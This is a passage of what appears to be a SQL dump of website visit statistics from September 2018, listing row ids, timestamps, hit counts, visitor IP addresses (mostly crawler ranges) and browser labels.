,1536148544,1,1,0,0,'66.249.66.26','chrome'),(298098,1536148630,1,1,0,0,'54.36.148.61','other'),(298099,1536148831,1,1,0,0,'54.36.148.62','other'),(298100,1536148944,1,1,0,0,'54.36.149.58','other'),(298101,1536149004,1,1,0,0,'54.36.148.25','other'),(298102,1536149028,1,1,0,0,'54.36.148.83','other'),(298103,1536149069,1,1,0,0,'54.36.149.2','other'),(298104,1536149355,1,1,0,0,'77.111.247.69','chrome'),(298105,1536149449,1,1,0,0,'54.36.148.37','other'),(298106,1536149541,1,1,0,0,'54.36.148.26','other'),(298107,1536149613,1,1,0,0,'37.9.113.114','other'),(298108,1536149628,1,1,0,0,'54.36.148.87','other'),(298109,1536149678,1,1,0,0,'54.36.148.10','other'),(298110,1536149680,1,1,0,0,'91.196.178.85','chrome'),(298111,1536149720,1,1,0,0,'54.36.148.100','other'),(298112,1536149778,2,2,0,0,'54.36.148.230','other'),(298113,1536149811,1,1,0,0,'54.36.148.66','other'),(298114,1536150111,1,0,1,0,'66.249.66.26',''),(298115,1536150123,1,0,1,0,'66.249.66.73',''),(298116,1536150181,1,1,0,0,'54.36.148.79','other'),(298117,1536150228,1,1,0,0,'54.36.148.47','other'),(298118,1536150233,1,1,0,0,'91.196.178.162','chrome'),(298119,1536150516,1,1,0,0,'95.132.23.47','firefox'),(298120,1536150523,1,1,0,0,'54.36.149.65','other'),(298121,1536150750,1,1,0,0,'54.36.149.41','other'),(298122,1536151009,1,1,0,0,'54.36.148.144','other'),(298123,1536151172,1,1,0,0,'91.196.178.43','other'),(298124,1536151173,1,1,0,0,'54.36.148.254','other'),(298125,1536151288,1,1,0,0,'54.36.148.46','other'),(298126,1536151381,1,1,0,0,'54.36.148.86','other'),(298127,1536151648,1,1,0,0,'54.36.148.17','other'),(298128,1536151961,1,1,0,0,'54.36.149.19','other'),(298129,1536152055,1,0,1,0,'66.249.66.74',''),(298130,1536152068,1,1,0,0,'54.36.148.255','other'),(298131,1536152257,1,1,0,0,'54.36.148.33','other'),(298132,1536152484,1,1,0,0,'54.36.148.161','other'),(298133,1536152579,1,1,0,0,'54.36.148.214','other'),(298134,1536152741,1,1,0,0,'54.36.148.198','other'),(298135,1536152809,1,1,0,0,'91.196.178.162','chrome'),(298136,1536152837,1,1,0,0,'40.77.167.120','other'),(298137,1536152859,1,1,0,0,'92.113.189.235','chrome'),(298138,1536152892,1,1,0,0,'91.196.178.94','firefox'),(298139,1536152968,2,2,0,0,'54.36.148.41','other'),(298140,1536153099,1,1,0,0,'54.36.148.222','other'),(298141,1536153150,1,1,0,0,'54.36.148.191','other'),(298142,1536153187,1,1,0,0,'54.36.148.24','other'),(298143,1536153259,1,1,0,0,'54.36.148.61','other'),(298144,1536153277,1,0,1,0,'66.249.66.73',''),(298145,1536153297,1,1,0,0,'31.13.115.7','other'),(298146,1536153330,1,1,0,0,'31.13.127.4','other'),(298147,1536153427,1,0,1,0,'66.249.66.75',''),(298148,1536153525,1,0,1,0,'66.249.66.74',''),(298149,1536153572,1,1,0,0,'54.36.148.74','other'),(298150,1536153670,1,1,0,0,'54.36.149.23','other'),(298151,1536153807,1,1,0,0,'5.45.75.6','firefox'),(298152,1536153905,1,1,0,0,'54.36.148.12','other'),(298153,1536153962,1,1,0,0,'66.249.66.25','chrome'),(298154,1536153963,1,1,0,0,'91.196.178.83','chrome'),(298155,1536154069,1,1,0,0,'54.36.148.171','other'),(298156,1536154109,1,1,0,0,'54.36.149.68','other'),(298157,1536154204,1,1,0,0,'69.171.251.13','other'),(298158,1536154636,1,1,0,0,'91.196.178.162','chrome'),(298159,1536154637,1,1,0,0,'54.36.148.46','other'),(298160,1536154707,1,1,0,0,'8.29.198.25','other'),(298161,1536154867,1,1,0,0,'54.36.148.160','other'),(298162,1536154985,1,1,0,0,'54.36.149.75','other'),(298163,1536155039,1,1,0,0,'54.36.148.211','other'),(298164,1536155092,1,1,0,0,'54.36.148.156','other'),(298165,1536155200,1,1,0,0,'54.36.148.247','other'),(298166,1536155263,1,1,0,0,'54.36.148.222','other'),(298167,1536155531,1,1,0,0,'54.36.148.100','other'),(298168,1536155542,1,1,0,0,'54.36.148.15','other'),(298169,1536155576,1,1,0,0,'54.36.148.196','other'),(298170,1536155615,1,1,0,0,'54.36.149.93','other'),(298171,1536155643,1,1,0,0,'54.36.149.100','other'),(298172,1536155644,1,1,0,0,'87.250.224.46','other'),(298173,1536155759,1,1,0,0,'54.36.148.136','other'),(298174,1536155774,1,1,0,0,'91.196.178.162','chrome'),(298175,1536155819,1,0,1,0,'66.249.66.25',''),(298176,1536155835,1,1,0,0,'69.171.251.16','other'),(298177,1536155954,1,1,0,0,'54.36.149.60','other'),(298178,1536155992,1,1,0,0,'46.211.6.167','other'),(298179,1536156007,1,1,0,0,'46.211.26.238','other'),(298180,1536156014,1,1,0,0,'91.196.178.130','firefox'),(298181,1536156015,1,1,0,0,'54.36.148.194','other'),(298182,1536156076,1,1,0,0,'54.36.148.216','other'),(298183,1536156116,1,1,0,0,'54.36.148.96','other'),(298184,1536156167,1,1,0,0,'91.196.178.66','firefox'),(298185,1536156498,1,1,0,0,'54.36.148.232','other'),(298186,1536156612,1,1,0,0,'54.36.149.74','other'),(298187,1536156633,1,0,1,0,'66.249.66.74',''),(298188,1536156711,2,2,0,0,'94.244.18.38','other'),(298189,1536156772,1,1,0,0,'54.36.148.126','other'),(298190,1536156876,1,1,0,0,'91.195.156.46','chrome'),(298191,1536156962,1,1,0,0,'91.196.178.97','other'),(298192,1536157008,1,1,0,0,'54.36.148.39','other'),(298193,1536157009,1,1,0,0,'54.36.148.193','other'),(298194,1536157045,1,1,0,0,'54.36.149.69','other'),(298195,1536157100,1,1,0,0,'54.36.148.19','other'),(298196,1536157173,3,1,2,0,'66.249.66.75',''),(298197,1536157471,1,1,0,0,'54.36.148.34','other'),(298198,1536157586,1,1,0,0,'54.36.148.136','other'),(298199,1536157885,1,1,0,0,'54.36.148.130','other'),(298200,1536157981,1,1,0,0,'54.36.148.112','other'),(298201,1536158084,1,1,0,0,'54.36.148.198','other'),(298202,1536158356,1,1,0,0,'54.36.148.252','other'),(298203,1536158496,1,1,0,0,'54.36.148.247','other'),(298204,1536158525,1,1,0,0,'54.36.149.3','other'),(298205,1536158596,1,1,0,0,'54.36.148.12','other'),(298206,1536158744,1,1,0,0,'216.244.66.241','other'),(298207,1536158920,1,1,0,0,'54.36.148.64','other'),(298208,1536159229,1,1,0,0,'54.36.148.124','other'),(298209,1536159247,1,1,0,0,'54.36.148.245','other'),(298210,1536159252,1,1,0,0,'51.255.65.46','other'),(298211,1536159479,1,1,0,0,'54.36.149.84','other'),(298212,1536159492,2,1,1,0,'66.249.66.25',''),(298213,1536159568,1,1,0,0,'54.36.149.66','other'),(298214,1536159704,1,1,0,0,'54.36.149.54','other'),(298215,1536159705,1,0,1,0,'66.249.66.73',''),(298216,1536159786,1,1,0,0,'54.36.148.47','other'),(298217,1536159961,1,1,0,0,'54.36.148.222','other'),(298218,1536160007,1,1,0,0,'54.36.148.171','other'),(298219,1536160027,1,1,0,0,'91.196.178.79','firefox'),(298220,1536160129,1,1,0,0,'54.36.148.213','other'),(298221,1536160139,1,1,0,0,'54.36.148.48','other'),(298222,1536160214,1,1,0,0,'54.36.148.103','other'),(298223,1536160223,1,1,0,0,'54.36.148.93','other'),(298224,1536160509,1,1,0,0,'54.36.148.95','other'),(298225,1536160531,1,1,0,0,'54.36.148.238','other'),(298226,1536160594,1,1,0,0,'54.36.148.21','other'),(298227,1536160740,3,0,3,0,'66.249.66.75',''),(298228,1536160829,1,1,0,0,'54.36.148.18','other'),(298229,1536160848,1,1,0,0,'54.36.148.244','other'),(298230,1536161085,1,1,0,0,'54.36.148.180','other'),(298231,1536161216,1,1,0,0,'54.36.149.78','other'),(298232,1536161241,1,1,0,0,'54.36.148.53','other'),(298233,1536161328,1,1,0,0,'54.36.149.85','other'),(298234,1536161353,1,1,0,0,'54.36.148.246','other'),(298235,1536161389,1,1,0,0,'188.230.43.254','other'),(298236,1536161475,1,1,0,0,'54.36.148.85','other'),(298237,1536161606,1,1,0,0,'54.36.148.138','other'),(298238,1536161703,1,1,0,0,'92.113.189.235','chrome'),(298239,1536161840,1,1,0,0,'54.36.148.51','other'),(298240,1536161949,1,1,0,0,'54.36.149.35','other'),(298241,1536161997,1,1,0,0,'141.8.142.74','other'),(298242,1536162201,1,1,0,0,'54.36.148.186','other'),(298243,1536162206,1,1,0,0,'54.36.148.29','other'),(298244,1536162272,1,1,0,0,'185.191.204.7','chrome'),(298245,1536162433,1,1,0,0,'54.36.149.9','other'),(298246,1536162480,1,1,0,0,'54.36.149.56','other'),(298247,1536162482,1,1,0,0,'54.36.148.25','other'),(298248,1536162506,1,1,0,0,'54.36.148.70','other'),(298249,1536162553,1,1,0,0,'54.36.149.83','other'),(298250,1536162574,1,1,0,0,'54.36.148.147','other'),(298251,1536162603,1,1,0,0,'54.36.148.38','other'),(298252,1536162821,1,0,1,0,'66.249.66.73',''),(298253,1536162875,1,1,0,0,'91.196.178.187','chrome'),(298254,1536163026,1,1,0,0,'54.36.148.124','other'),(298255,1536163196,3,3,0,0,'216.244.66.241','other'),(298256,1536163225,1,1,0,0,'54.36.149.74','other'),(298257,1536163478,1,1,0,0,'46.211.104.26','chrome'),(298258,1536163485,3,3,0,0,'46.211.49.163','chrome'),(298259,1536163551,1,1,0,0,'54.36.148.131','other'),(298260,1536163667,1,1,0,0,'46.133.122.2','chrome'),(298261,1536163686,1,1,0,0,'37.73.176.49','chrome'),(298262,1536163705,1,1,0,0,'46.211.25.175','chrome'),(298263,1536163718,1,1,0,0,'157.55.39.171','other'),(298264,1536163726,1,1,0,0,'66.102.9.27','chrome'),(298265,1536163738,1,1,0,0,'37.73.251.171','chrome'),(298266,1536163816,1,1,0,0,'54.36.149.12','other'),(298267,1536163854,1,1,0,0,'54.36.148.234','other'),(298268,1536163928,1,1,0,0,'54.36.148.112','other'),(298269,1536164014,1,1,0,0,'46.211.153.172','chrome'),(298270,1536164036,2,2,0,0,'66.102.9.25','chrome'),(298271,1536164049,1,1,0,0,'54.36.148.65','other'),(298272,1536164221,1,1,0,0,'216.244.66.241','other'),(298273,1536164231,1,1,0,0,'54.36.148.33','other'),(298274,1536164254,2,0,2,0,'66.249.66.75',''),(298275,1536164274,1,1,0,0,'54.36.148.228','other'),(298276,1536164368,1,1,0,0,'91.196.178.99','other'),(298277,1536164397,1,1,0,0,'66.102.9.157','chrome'),(298278,1536164452,1,1,0,0,'54.36.148.217','other'),(298279,1536164662,1,1,0,0,'66.249.66.27','chrome'),(298280,1536164664,1,0,1,0,'66.249.66.25',''),(298281,1536164686,1,1,0,0,'91.196.178.104','chrome'),(298282,1536164844,1,1,0,0,'54.36.148.200','other'),(298283,1536164935,1,1,0,0,'54.36.149.87','other'),(298284,1536165248,1,1,0,0,'54.36.148.53','other'),(298285,1536165290,1,1,0,0,'54.36.148.156','other'),(298286,1536165297,1,1,0,0,'95.163.255.117','other'),(298287,1536165301,1,1,0,0,'95.163.255.102','other'),(298288,1536165306,1,1,0,0,'95.163.255.105','other'),(298289,1536165310,1,1,0,0,'95.163.255.119','other'),(298290,1536165456,1,1,0,0,'37.54.21.3','chrome'),(298291,1536165568,1,1,0,0,'91.196.178.66','firefox'),(298292,1536165583,1,1,0,0,'8.29.198.27','other'),(298293,1536165619,1,1,0,0,'54.36.149.70','other'),(298294,1536165820,1,1,0,0,'54.36.148.78','other'),(298295,1536166160,1,1,0,0,'54.36.148.166','other'),(298296,1536166277,1,1,0,0,'54.36.148.254','other'),(298297,1536166278,1,1,0,0,'37.73.135.63','other'),(298298,1536166433,1,1,0,0,'54.36.148.68','other'),(298299,1536166541,1,1,0,0,'54.36.148.51','other'),(298300,1536166632,1,0,1,0,'66.249.66.75',''),(298301,1536166801,1,1,0,0,'54.36.148.106','other'),(298302,1536166881,1,1,0,0,'46.211.154.143','chrome'),(298303,1536166970,1,1,0,0,'54.36.149.106','other'),(298304,1536167008,1,1,0,0,'54.36.149.61','other'),(298305,1536167027,2,2,0,0,'54.36.148.38','other'),(298306,1536167056,1,1,0,0,'54.36.148.12','other'),(298307,1536167114,1,1,0,0,'66.102.9.27','chrome'),(298308,1536167126,1,1,0,0,'91.196.178.99','chrome'),(298309,1536167128,1,1,0,0,'54.36.148.197','other'),(298310,1536167137,1,1,0,0,'54.36.148.215','other'),(298311,1536167154,1,1,0,0,'91.196.178.130','other'),(298312,1536167267,1,1,0,0,'54.36.149.78','other'),(298313,1536167591,1,1,0,0,'79.110.130.29','other'),(298314,1536167890,1,1,0,0,'54.36.149.22','other'),(298315,1536167979,1,1,0,0,'54.36.148.183','other'),(298316,1536168101,1,1,0,0,'54.36.149.32','other'),(298317,1536168133,1,1,0,0,'54.36.148.127','other'),(298318,1536168200,1,1,0,0,'54.36.148.16','other'),(298319,1536168242,1,1,0,0,'54.36.148.70','other'),(298320,1536168457,1,1,0,0,'54.36.148.206','other'),(298321,1536168490,1,0,1,0,'66.249.66.27',''),(298322,1536168498,1,1,0,0,'66.249.66.25','chrome'),(298323,1536168527,1,1,0,0,'91.196.177.96','chrome'),(298324,1536168554,1,1,0,0,'69.171.251.25','other'),(298325,1536168831,1,1,0,0,'91.196.178.103','chrome'),(298326,1536168925,1,1,0,0,'54.36.148.214','other'),(298327,1536169035,1,1,0,0,'54.36.148.238','other'),(298328,1536169140,1,1,0,0,'54.36.149.53','other'),(298329,1536169236,1,1,0,0,'54.36.148.142','other'),(298330,1536169248,1,1,0,0,'92.113.189.235','chrome'),(298331,1536169317,1,1,0,0,'54.36.148.226','other'),(298332,1536169374,1,1,0,0,'54.36.148.125','other'),(298333,1536169377,1,1,0,0,'95.163.255.95','other'),(298334,1536169513,1,1,0,0,'54.36.148.51','other'),(298335,1536169604,1,0,1,0,'66.249.66.74',''),(298336,1536170092,1,1,0,0,'188.230.43.254','other'),(298337,1536170109,1,1,0,0,'54.36.148.79','other'),(298338,1536170232,2,2,0,0,'46.133.8.148','chrome'),(298339,1536170256,2,2,0,0,'54.36.149.4','other'),(298340,1536170424,1,1,0,0,'54.36.148.97','other'),(298341,1536170434,1,1,0,0,'91.196.178.69','chrome'),(298342,1536170476,1,1,0,0,'91.196.178.93','chrome'),(298343,1536170524,1,1,0,0,'54.36.148.80','other'),(298344,1536170604,1,1,0,0,'54.36.148.32','other'),(298345,1536170640,1,1,0,0,'54.36.148.132','other'),(298346,1536170710,1,1,0,0,'91.196.178.98','chrome'),(298347,1536170789,1,1,0,0,'66.220.149.10','other'),(298348,1536170833,1,1,0,0,'54.36.148.131','other'),(298349,1536170890,1,1,0,0,'78.56.32.215','chrome'),(298350,1536171120,1,1,0,0,'180.76.15.154','other'),(298351,1536171128,1,1,0,0,'93.100.84.166','chrome'),(298352,1536171185,1,1,0,0,'54.36.148.194','other'),(298353,1536171217,1,1,0,0,'54.36.148.107','other'),(298354,1536171235,1,1,0,0,'54.36.148.58','other'),(298355,1536171376,1,1,0,0,'54.36.148.129','other'),(298356,1536171474,1,1,0,0,'54.36.149.24','other'),(298357,1536171692,1,1,0,0,'54.36.148.240','other'),(298358,1536171756,1,1,0,0,'54.36.148.114','other'),(298359,1536171765,1,1,0,0,'54.36.149.16','other'),(298360,1536171870,2,0,2,0,'66.249.66.73',''),(298361,1536171897,1,1,0,0,'54.36.148.220','other'),(298362,1536171937,1,0,1,0,'66.249.66.74',''),(298363,1536172112,1,1,0,0,'54.36.148.205','other'),(298364,1536172133,1,1,0,0,'54.36.148.82','other'),(298365,1536172327,1,1,0,0,'178.154.171.88','other'),(298366,1536172330,1,1,0,0,'141.8.142.74','other'),(298367,1536172368,1,1,0,0,'54.36.149.6','other'),(298368,1536172446,1,1,0,0,'54.36.148.101','other'),(298369,1536172465,1,1,0,0,'216.244.66.241','other'),(298370,1536172487,1,1,0,0,'46.211.27.24','other'),(298371,1536172501,1,1,0,0,'188.230.43.254','other'),(298372,1536172508,1,1,0,0,'54.36.148.193','other'),(298373,1536172821,1,1,0,0,'46.211.115.254','chrome'),(298374,1536172952,1,1,0,0,'91.196.178.35','other'),(298375,1536172959,1,1,0,0,'91.196.178.129','other'),(298376,1536172965,1,1,0,0,'54.36.148.121','other'),(298377,1536173013,1,1,0,0,'54.36.148.81','other'),(298378,1536173120,1,1,0,0,'180.76.15.10','other'),(298379,1536173126,1,1,0,0,'91.196.178.132','chrome'),(298380,1536173347,1,1,0,0,'91.196.178.74','chrome'),(298381,1536173351,1,1,0,0,'178.92.159.61','chrome'),(298382,1536173446,1,1,0,0,'54.36.148.251','other'),(298383,1536173461,1,1,0,0,'54.36.148.59','other'),(298384,1536173549,1,1,0,0,'54.36.148.216','other'),(298385,1536173619,1,1,0,0,'54.36.149.53','other'),(298386,1536173620,1,1,0,0,'95.163.255.197','other'),(298387,1536173634,1,1,0,0,'213.159.243.209','chrome'),(298388,1536173665,1,0,1,0,'66.249.66.75',''),(298389,1536173683,1,1,0,0,'141.8.142.74','other'),(298390,1536173875,1,1,0,0,'46.211.5.109','chrome'),(298391,1536173882,1,1,0,0,'37.55.57.172','chrome'),(298392,1536173908,1,1,0,0,'54.36.149.70','other'),(298393,1536173948,1,1,0,0,'66.249.66.76','chrome'),(298394,1536173976,1,1,0,0,'46.211.1.64','chrome'),(298395,1536173988,1,0,1,0,'66.249.66.73',''),(298396,1536174027,1,1,0,0,'54.36.148.104','other'),(298397,1536174058,1,1,0,0,'91.196.178.131','other'),(298398,1536174065,1,1,0,0,'54.36.148.129','other'),(298399,1536174205,1,1,0,0,'54.36.148.182','other'),(298400,1536174234,1,1,0,0,'40.77.167.123','other'),(298401,1536174242,1,1,0,0,'54.36.148.131','other'),(298402,1536174577,1,1,0,0,'54.36.148.181','other'),(298403,1536174591,1,1,0,0,'91.196.179.77','other'),(298404,1536174712,1,1,0,0,'40.77.167.5','other'),(298405,1536174752,1,1,0,0,'54.36.149.49','other'),(298406,1536174882,1,1,0,0,'54.36.149.40','other'),(298407,1536175014,1,1,0,0,'207.46.13.187','other'),(298408,1536175085,1,1,0,0,'45.99.34.39','chrome'),(298409,1536175135,1,1,0,0,'54.36.148.220','other'),(298410,1536175251,1,1,0,0,'54.36.148.222','other'),(298411,1536175378,1,1,0,0,'54.36.149.16','other'),(298412,1536175467,1,1,0,0,'91.196.178.46','chrome'),(298413,1536175469,2,2,0,0,'54.36.148.175','other'),(298414,1536175554,1,1,0,0,'54.36.149.87','other'),(298415,1536175752,1,1,0,0,'125.70.110.4','other'),(298416,1536175894,1,1,0,0,'54.36.148.210','other'),(298417,1536175946,1,1,0,0,'54.36.148.40','other'),(298418,1536175966,1,1,0,0,'54.36.149.21','other'),(298419,1536175967,2,0,2,0,'66.249.66.74',''),(298420,1536176040,1,1,0,0,'91.124.118.31','chrome'),(298421,1536176240,1,1,0,0,'141.8.142.74','other'),(298422,1536176447,1,1,0,0,'8.29.198.27','other'),(298423,1536176519,3,3,0,0,'66.249.66.73','chrome'),(298424,1536176558,4,4,0,0,'66.249.66.74','chrome'),(298425,1536176570,1,1,0,0,'54.36.148.120','other'),(298426,1536176669,3,3,0,0,'66.249.66.75','chrome'),(298427,1536176853,1,1,0,0,'54.36.148.23','other'),(298428,1536176856,1,1,0,0,'94.179.246.17','chrome'),(298429,1536176969,1,1,0,0,'54.36.149.63','other'),(298430,1536177128,1,1,0,0,'54.36.148.125','other'),(298431,1536177166,1,1,0,0,'5.58.62.42','chrome'),(298432,1536177199,1,1,0,0,'54.36.149.6','other'),(298433,1536177392,1,1,0,0,'54.36.148.100','other'),(298434,1536177540,4,4,0,0,'66.249.66.74','chrome'),(298435,1536177582,1,1,0,0,'54.36.148.64','other'),(298436,1536177816,1,1,0,0,'54.36.148.93','other'),(298437,1536177928,1,1,0,0,'54.36.149.26','other'),(298438,1536177949,2,2,0,0,'40.77.167.71','other'),(298439,1536177975,1,1,0,0,'54.36.149.38','other'),(298440,1536178147,2,2,0,0,'141.8.142.74','other'),(298441,1536178249,1,1,0,0,'54.36.148.105','other'),(298442,1536178361,1,1,0,0,'54.36.149.59','other'),(298443,1536178372,3,3,0,0,'66.249.66.75','chrome'),(298444,1536178378,3,3,0,0,'66.249.66.73','chrome'),(298445,1536178416,1,1,0,0,'54.36.148.70','other'),(298446,1536178433,3,3,0,0,'66.249.66.25','chrome'),(298447,1536178445,1,1,0,0,'54.36.149.72','other'),(298448,1536178500,4,4,0,0,'66.249.66.74','chrome'),(298449,1536178642,8,8,0,0,'66.249.66.26','chrome'),(298450,1536178674,1,1,0,0,'54.36.149.78','other'),(298451,1536178758,2,2,0,0,'66.249.66.27','chrome'),(298452,1536178857,1,1,0,0,'54.36.148.114','other'),(298453,1536178929,1,1,0,0,'54.36.149.14','other'),(298454,1536179130,1,1,0,0,'54.36.148.123','other'),(298455,1536179151,1,1,0,0,'54.36.149.93','other'),(298456,1536179215,1,1,0,0,'54.36.148.194','other'),(298457,1536179320,34,34,0,0,'66.249.66.73','chrome'),(298458,1536179366,1,1,0,0,'66.249.66.76','chrome'),(298459,1536179386,1,1,0,0,'54.36.148.207','other'),(298460,1536179404,7,7,0,0,'66.249.66.25','chrome'),(298461,1536179536,5,5,0,0,'66.249.66.74','chrome'),(298462,1536179590,1,1,0,0,'216.244.66.241','other'),(298463,1536179617,3,3,0,0,'66.249.66.26','chrome'),(298464,1536179725,1,1,0,0,'54.36.148.53','other'),(298465,1536179729,1,1,0,0,'54.36.148.66','other'),(298466,1536180012,1,1,0,0,'54.36.148.134','other'),(298467,1536180037,1,1,0,0,'54.36.149.6','other'),(298468,1536180102,1,1,0,0,'141.8.142.74','other'),(298469,1536180375,1,1,0,0,'54.36.148.212','other'),(298470,1536180417,1,1,0,0,'54.36.149.30','other'),(298471,1536180486,2,2,0,0,'66.249.66.75','chrome'),(298472,1536180733,3,3,0,0,'66.249.66.26','chrome'),(298473,1536180759,15,15,0,0,'66.249.66.73','chrome'),(298474,1536180823,1,1,0,0,'54.36.149.16','other'),(298475,1536181134,1,1,0,0,'54.36.148.79','other'),(298476,1536181137,10,9,1,0,'66.249.66.74',''),(298477,1536181162,1,1,0,0,'130.180.208.120','chrome'),(298478,1536181245,1,1,0,0,'54.36.148.89','other'),(298479,1536181387,3,3,0,0,'66.249.66.75','chrome'),(298480,1536181475,1,1,0,0,'54.36.148.185','other'),(298481,1536181527,1,1,0,0,'54.36.148.96','other'),(298482,1536181610,1,1,0,0,'54.36.148.176','other'),(298483,1536181693,1,1,0,0,'54.36.148.90','other'),(298484,1536181844,9,9,0,0,'66.249.66.73','chrome'),(298485,1536182022,1,1,0,0,'54.36.148.43','other'),(298486,1536182283,1,1,0,0,'54.36.149.8','other'),(298487,1536182403,1,1,0,0,'54.36.149.56','other'),(298488,1536182662,2,2,0,0,'141.8.142.74','other'),(298489,1536182726,2,2,0,0,'66.249.66.74','chrome'),(298490,1536182753,11,11,0,0,'66.249.66.73','chrome'),(298491,1536182797,1,1,0,0,'134.249.141.24','firefox'),(298492,1536182837,1,1,0,0,'66.249.66.75','chrome'),(298493,1536182948,1,1,0,0,'54.36.149.85','other'),(298494,1536183195,1,1,0,0,'54.36.148.85','other'),(298495,1536183214,1,1,0,0,'54.36.148.205','other'),(298496,1536183281,1,1,0,0,'54.36.149.92','other'),(298497,1536183600,1,1,0,0,'141.8.142.74','other'),(298498,1536183620,1,1,0,0,'54.36.149.19','other'),(298499,1536183658,1,1,0,0,'54.36.148.51','other'),(298500,1536183732,1,1,0,0,'54.36.149.0','other'),(298501,1536183783,1,1,0,0,'54.36.148.142','other'),(298502,1536184217,1,1,0,0,'54.36.148.104','other'),(298503,1536184468,2,2,0,0,'178.154.171.88','other'),(298504,1536184509,1,1,0,0,'54.36.149.80','other'),(298505,1536184563,1,1,0,0,'54.36.148.122','other'),(298506,1536184577,1,1,0,0,'54.36.148.173','other'),(298507,1536184625,1,1,0,0,'54.36.148.151','other'),(298508,1536185104,1,1,0,0,'54.36.148.61','other'),(298509,1536185105,1,1,0,0,'54.36.148.208','other'),(298510,1536185152,1,1,0,0,'54.36.148.68','other'),(298511,1536185170,1,1,0,0,'54.36.148.190','other'),(298512,1536185172,1,1,0,0,'54.36.149.21','other'),(298513,1536185207,1,1,0,0,'54.36.148.12','other'),(298514,1536185580,1,1,0,0,'54.36.149.56','other'),(298515,1536185838,1,1,0,0,'54.36.148.32','other'),(298516,1536186160,1,1,0,0,'141.8.142.74','other'),(298517,1536186164,1,1,0,0,'54.36.148.253','other'),(298518,1536186195,1,1,0,0,'87.250.224.46','other'),(298519,1536186542,1,1,0,0,'207.46.13.64','other'),(298520,1536186677,2,2,0,0,'54.36.148.125','other'),(298521,1536186694,1,1,0,0,'54.36.149.63','other'),(298522,1536186698,1,1,0,0,'54.36.148.182','other'),(298523,1536186717,1,1,0,0,'54.36.149.81','other'),(298524,1536186993,1,1,0,0,'54.36.148.138','other'),(298525,1536187008,1,1,0,0,'54.36.148.99','other'),(298526,1536187107,1,1,0,0,'54.36.149.60','other'),(298527,1536187243,1,1,0,0,'54.36.149.102','other'),(298528,1536187299,1,1,0,0,'8.29.198.27','other'),(298529,1536187394,2,2,0,0,'54.36.148.56','other'),(298530,1536187721,1,1,0,0,'54.36.148.46','other'),(298531,1536187824,1,1,0,0,'54.36.149.83','other'),(298532,1536188040,2,2,0,0,'141.8.142.74','other'),(298533,1536188109,1,1,0,0,'54.36.148.199','other'),(298534,1536188393,1,1,0,0,'54.36.148.20','other'),(298535,1536188440,1,1,0,0,'54.36.148.97','other'),(298536,1536188635,1,1,0,0,'54.36.148.70','other'),(298537,1536188715,1,1,0,0,'54.36.149.90','other'),(298538,1536188759,1,1,0,0,'54.36.148.130','other'),(298539,1536188877,1,1,0,0,'178.154.171.88','other'),(298540,1536188878,1,1,0,0,'40.77.167.123','other'),(298541,1536189402,1,1,0,0,'54.36.148.86','other'),(298542,1536189508,1,1,0,0,'54.36.148.233','other'),(298543,1536189573,1,1,0,0,'54.36.149.79','other'),(298544,1536189749,1,1,0,0,'54.36.148.123','other'),(298545,1536189793,1,1,0,0,'54.36.148.84','other'),(298546,1536189827,1,1,0,0,'54.36.148.153','other'),(298547,1536189852,1,1,0,0,'141.8.142.74','other'),(298548,1536189999,1,1,0,0,'54.36.148.95','other'),(298549,1536190086,1,1,0,0,'174.118.203.215','chrome'),(298550,1536190350,1,1,0,0,'54.36.148.207','other'),(298551,1536190401,1,1,0,0,'54.36.148.41','other'),(298552,1536190504,1,1,0,0,'54.36.148.63','other'),(298553,1536190633,1,1,0,0,'54.36.148.48','other'),(298554,1536190724,1,1,0,0,'54.36.148.137','other'),(298555,1536190932,1,1,0,0,'54.36.148.237','other'),(298556,1536191382,1,1,0,0,'54.36.148.148','other'),(298557,1536191429,1,1,0,0,'54.36.148.134','other'),(298558,1536191458,1,1,0,0,'54.36.148.181','other'),(298559,1536191643,1,1,0,0,'54.36.148.218','other'),(298560,1536191644,1,1,0,0,'54.36.148.76','other'),(298561,1536191741,1,1,0,0,'157.55.39.212','other'),(298562,1536192088,1,1,0,0,'54.36.149.14','other'),(298563,1536192124,1,1,0,0,'54.36.148.58','other'),(298564,1536192161,1,1,0,0,'54.36.149.107','other'),(298565,1536192222,1,1,0,0,'54.36.148.214','other'),(298566,1536192398,1,1,0,0,'54.36.148.87','other'),(298567,1536192624,2,2,0,0,'141.8.142.74','other'),(298568,1536192641,1,1,0,0,'54.36.149.100','other'),(298569,1536192857,1,1,0,0,'54.36.148.165','other'),(298570,1536193031,1,1,0,0,'54.36.148.158','other'),(298571,1536193090,1,1,0,0,'66.249.66.75','chrome'),(298572,1536193187,1,1,0,0,'54.36.148.203','other'),(298573,1536193235,1,1,0,0,'54.36.148.67','other'),(298574,1536193401,1,1,0,0,'54.36.148.46','other'),(298575,1536193430,1,1,0,0,'54.36.148.62','other'),(298576,1536193771,1,1,0,0,'54.36.148.165','other'),(298577,1536194029,1,1,0,0,'54.36.148.92','other'),(298578,1536194069,1,1,0,0,'193.106.30.98','firefox'),(298579,1536194090,6,6,0,0,'66.249.66.73','chrome'),(298580,1536194223,1,1,0,0,'54.36.148.147','other'),(298581,1536194399,4,4,0,0,'66.249.66.74','chrome'),(298582,1536194554,2,2,0,0,'54.36.149.100','other'),(298583,1536194582,1,1,0,0,'54.36.148.199','other'),(298584,1536194634,1,1,0,0,'40.77.167.123','other'),(298585,1536194730,1,1,0,0,'54.36.149.83','other'),(298586,1536194761,1,1,0,0,'54.36.149.14','other'),(298587,1536194980,1,1,0,0,'141.8.142.74','other'),(298588,1536195143,3,3,0,0,'54.36.148.230','other'),(298589,1536195180,6,6,0,0,'66.249.66.73','chrome'),(298590,1536195546,3,3,0,0,'66.249.66.74','chrome'),(298591,1536195709,1,1,0,0,'54.36.148.146','other'),(298592,1536195710,1,1,0,0,'54.36.149.46','other'),(298593,1536195924,1,1,0,0,'54.36.148.176','other'),(298594,1536195925,1,1,0,0,'54.36.148.148','other'),(298595,1536195982,1,1,0,0,'54.36.149.17','other'),(298596,1536196177,3,3,0,0,'66.249.66.75','chrome'),(298597,1536196183,2,2,0,0,'66.249.66.73','chrome'),(298598,1536196276,1,1,0,0,'54.36.148.145','other'),(298599,1536196287,1,1,0,0,'54.36.148.62','other'),(298600,1536196321,1,1,0,0,'54.36.148.53','other'),(298601,1536196324,1,1,0,0,'54.36.148.196','other'),(298602,1536196711,1,1,0,0,'54.36.149.75','other'),(298603,1536197041,1,1,0,0,'54.36.148.92','other'),(298604,1536197057,1,1,0,0,'54.36.148.50','other'),(298605,1536197110,6,6,0,0,'66.249.66.74','chrome'),(298606,1536197243,1,1,0,0,'54.36.149.95','other'),(298607,1536197287,1,1,0,0,'54.36.148.13','other'),(298608,1536197315,1,1,0,0